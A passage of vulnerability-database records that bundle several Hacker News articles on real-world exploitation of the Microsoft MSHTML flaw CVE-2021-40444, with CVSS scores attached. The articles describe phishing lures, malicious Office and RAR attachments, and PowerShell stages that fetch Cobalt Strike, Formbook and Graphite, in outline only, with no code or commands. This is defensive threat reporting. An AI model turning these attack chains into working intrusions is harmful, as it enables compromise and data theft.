"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T15:55:37", "description": "Google's Threat Analysis Group (TAG) took the wraps off a new [initial access 
broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens [said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti 
leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. 
The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MSHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds with commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may possibly be working from a Central or Eastern European time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n",
"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:04", "description": "A new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows 
MSHTML platform to target Farsi-speaking victims with a previously undocumented PowerShell-based information stealer designed to harvest extensive details from infected machines.\n\n\"[T]he stealer is a PowerShell script, short with powerful collection capabilities \u2014 in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment,\" SafeBreach Labs researcher Tomer Bar [said](<https://www.safebreach.com/blog/2021/new-powershortshell-stealer-exploits-recent-microsoft-mshtml-vulnerability-to-spy-on-farsi-speakers/>) in a report published Wednesday.\n\nNearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at \"Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.\"\n\nThe phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be exploited using specially crafted Microsoft Office documents. The vulnerability was [patched](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) by Microsoft in September 2021, weeks after [reports](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) of active exploitation emerged in the wild.\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" the Windows maker had noted.\n\nThe attack sequence described by SafeBreach begins with the targets receiving a spear-phishing email that comes with a Word document as an attachment. Opening the file triggers the exploit for CVE-2021-40444, resulting in the execution of a PowerShell script dubbed \"PowerShortShell\" that's capable of hoovering up sensitive information and transmitting it to a command-and-control (C2) server.\n\nWhile infections involving the deployment of the info-stealer were observed on September 15, a day after Microsoft issued patches for the flaw, the aforementioned C2 server was also employed to harvest victims' Gmail and Instagram credentials as part of two phishing campaigns staged by the same adversary in July 2021.\n\nThe development is the latest in a string of attacks that have capitalized on the MSHTML rendering engine flaw, with Microsoft previously [disclosing](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that abused the vulnerability as part of an initial access campaign to distribute custom Cobalt Strike Beacon loaders.\n",
"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T11:33:00", "type": "thn", "title": "Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-22T07:07:24", "id": "THN:C4188C7A44467E425407D33067C14094", "href": "https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "A Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging 
the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). 
TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) 
was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). 
\"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n",
"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:47", "description": "A short-lived phishing campaign has been observed taking advantage of a novel exploit that bypassed a 
patch put in place by Microsoft to fix a remote code execution vulnerability affecting the MSHTML component with the goal of delivering Formbook malware.\n\n\"The attachments represent an escalation of the attacker's abuse of the CVE-2021-40444 bug and demonstrate that even a patch can't always mitigate the actions of a motivated and sufficiently skilled attacker,\" SophosLabs researchers Andrew Brandt and Stephen Ormandy [said](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) in a new report published Tuesday.\n\n[CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8) relates to a remote code execution flaw in MSHTML that could be exploited using specially crafted Microsoft Office documents. Although Microsoft addressed the security weakness as part of its September 2021 [Patch Tuesday updates](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>), it has been put to use in [multiple attacks](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) ever since details pertaining to the flaw became public.\n\nThat same month, the technology giant [uncovered](<https://thehackernews.com/2021/09/windows-mshtml-0-day-exploited-to.html>) a targeted phishing campaign that leveraged the vulnerability to deploy Cobalt Strike Beacons on compromised Windows systems. 
Then in November, SafeBreach Labs [reported](<https://thehackernews.com/2021/11/hackers-using-microsoft-mshtml-flaw-to.html>) details of an Iranian threat actor operation that targeted Farsi-speaking victims with a new PowerShell-based information stealer designed to gather sensitive information.\n\nThe new campaign discovered by Sophos aims to get around the patch's protection by morphing a publicly available [proof-of-concept Office exploit](<https://github.com/Edubr2020/CVE-2021-40444--CABless/blob/main/MS_Windows_CVE-2021-40444%20-%20'Ext2Prot'%20Vulnerability%20'CABless'%20version.pdf>) and weaponizing it to distribute Formbook malware. The cybersecurity firm said the success of the attack can, in part, be attributed to a \"too-narrowly focused patch.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgASEZ8KvlSBJz1x7Q76isjFrCp75Cd_9NaVZvtMfqRufKRIArSQn1kxLXk86-Tc0o12JfC_n6X-nPIvoEO3JsIgDQ7_PAcEYpeiqvhKofLuQ_e7qZik3FJ-7KTq5CGjh3R7RDATGz4b_HmeYkqXa4dKpvAvSXu-47iGQrPd2IjnRxR4klHyplckGLB>)\n\n\"In the initial versions of CVE-2021-40444 exploits, [the] malicious Office document retrieved a malware payload packaged into a Microsoft Cabinet (or .CAB) file,\" the researchers explained. \"When Microsoft's patch closed that loophole, attackers discovered they could use a different attack chain altogether by enclosing the maldoc in a specially crafted RAR archive.\"\n\n**CAB-less 40444**, as the modified exploit is called, lasted for 36 hours between October 24 and 25, during which spam emails containing a malformed RAR archive file were sent to potential victims. 
The RAR file, in turn, included a script written in Windows Script Host ([WSH](<https://en.wikipedia.org/wiki/Windows_Script_Host>)) and a Word Document that, upon opening, contacted a remote server hosting malicious JavaScript.\n\nConsequently, the JavaScript code utilized the Word Document as a conduit to launch the WSH script and execute an embedded PowerShell command in the RAR file to retrieve the [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>) malware payload from an attacker-controlled website.\n\nAs for why the exploit disappeared after a little over a day in use, clues lie in the fact that the modified RAR archive files wouldn't work with older versions of the WinRAR utility. \"So, unexpectedly, in this case, users of the much older, outdated version of WinRAR would have been better protected than users of the latest release,\" the researchers said.\n\n\"This research is a reminder that patching alone cannot protect against all vulnerabilities in all cases,\" SophosLabs Principal Researcher Andrew Brandt said. \"Setting restrictions that prevent a user from accidentally triggering a malicious document helps, but people can still be lured into clicking the 'enable content' button.\"\n\n\"It is therefore vitally important to educate employees and remind them to be suspicious of emailed documents, especially when they arrive in unusual or unfamiliar compressed file formats from people or companies they don't know,\" Brandt added. When reached for a response, a Microsoft spokesperson said \"we are investigating these reports and will take appropriate action as needed to help keep customers protected.\"\n\n**_Update:_** Microsoft told The Hacker News that the aforementioned exploit was indeed addressed with security updates that were released in September 2021. 
Sophos now notes that the CAB-less 40444 exploit \"may have evaded mitigations of CVE-2021-40444 without the September patch focused on the CAB-style attack\" and that the patch blocks the malicious behavior.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-22T07:45:00", "type": "thn", "title": "New Exploit Lets Malware Attackers Bypass Patch for Critical Microsoft MSHTML Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-29T03:33:40", "id": "THN:8A60310AB796B7372A105B7C8811306B", "href": "https://thehackernews.com/2021/12/new-exploit-lets-malware-attackers.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-02T06:04:33", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgRdLCnYaPXc_hVvRWhZ1nKYDtBRo6rwk1xGSO3wDrqcJ04igkpjKQyuyHKgmgeHL6GS7XLJjB6WCffBWb-ntXiCGFrcggxS3t1sQxo2LiuX7WI9F-gwW3tPRARSzEWceyzsLgu1VSyZndaF36ZhDlzpBRvkHLp7Ao_zaUYJmthkY4IZN4znwcyRdpY/s728-e100/hacking.jpg>)\n\nThe Russian state-sponsored threat actor known as [APT28](<https://thehackernews.com/2022/09/researchers-identify-3-hacktivist.html>) has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.\n\nThe technique \"is designed to be triggered when the user starts the presentation mode and moves the mouse,\" cybersecurity firm Cluster25 [said](<https://blog.cluster25.duskrise.com/2022/09/23/in-the-footsteps-of-the-fancy-bear-powerpoint-graphite/>) in a technical report. \"The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.\"\n\nThe dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications to retrieve additional payloads.\n\nThe attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development ([OECD](<https://en.wikipedia.org/wiki/OECD>)), a Paris-based intergovernmental entity.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjM4urmpBb2OaNLBBurEzXMWD5Gc0bF0d-1A8k55IscX0Hlkq-v1VQ39Xj9y7iwnPFlRBxvY1w6ZlUWb5dYTHpIwA3gVd7mcXXY64dImoNQO7bXe84Wez6JCWTlrdS77BnSIF6DllbmNoGykj67hPrGivBZDqdvzOgXckRo6adoi5bgIMpmnmWEI4_Y/s728-e100/ppt.jpg>)\n\nCluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.\n\nPotential targets of the operation likely include 
entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.\n\nThis is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix [disclosed](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>) a similar attack chain that exploited the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) to drop the backdoor.\n\nThe development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-28T10:09:00", "type": "thn", "title": "Hackers Using PowerPoint Mouseover Trick to Infect Systems with Malware", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-02T05:18:39", "id": "THN:B399D1943153CEEF405B85D4310C2142", "href": "https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:18", "description": "[](<https://thehackernews.com/images/-3vEprTVA4BI/YULvTEzYNCI/AAAAAAAADz0/RpSk1fU9GbcY7e98Gg2r8aBRvy73Z52kACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nMicrosoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.\n\n\"These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders,\" Microsoft Threat Intelligence Center [said](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in a technical write-up. 
\"These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\"\n\nDetails about CVE-2021-40444 (CVSS score: 8.8) first [emerged](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) on September 7 after researchers from EXPMON alerted the Windows maker about a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document,\" the researchers noted. Microsoft has since [rolled out a fix](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>) for the vulnerability as part of its Patch Tuesday updates a week later on September 14.\n\nThe Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.\n\nThe exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. 
The DLL, in turn, retrieves remotely hosted shellcode \u2014 a custom Cobalt Strike Beacon loader \u2014 and loads it into the Microsoft address import tool.\n\nAdditionally, Microsoft said some of the infrastructures that were used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).\n\n\"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack,\" the researchers said. \"It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\"\n\nIn an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.\n\n\"The association of a zero-day exploit with a ransomware group, however remote, is troubling,\" RiskIQ researchers [said](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>). \"It suggests either that turnkey tools like zero-day exploits have found their way into the already robust 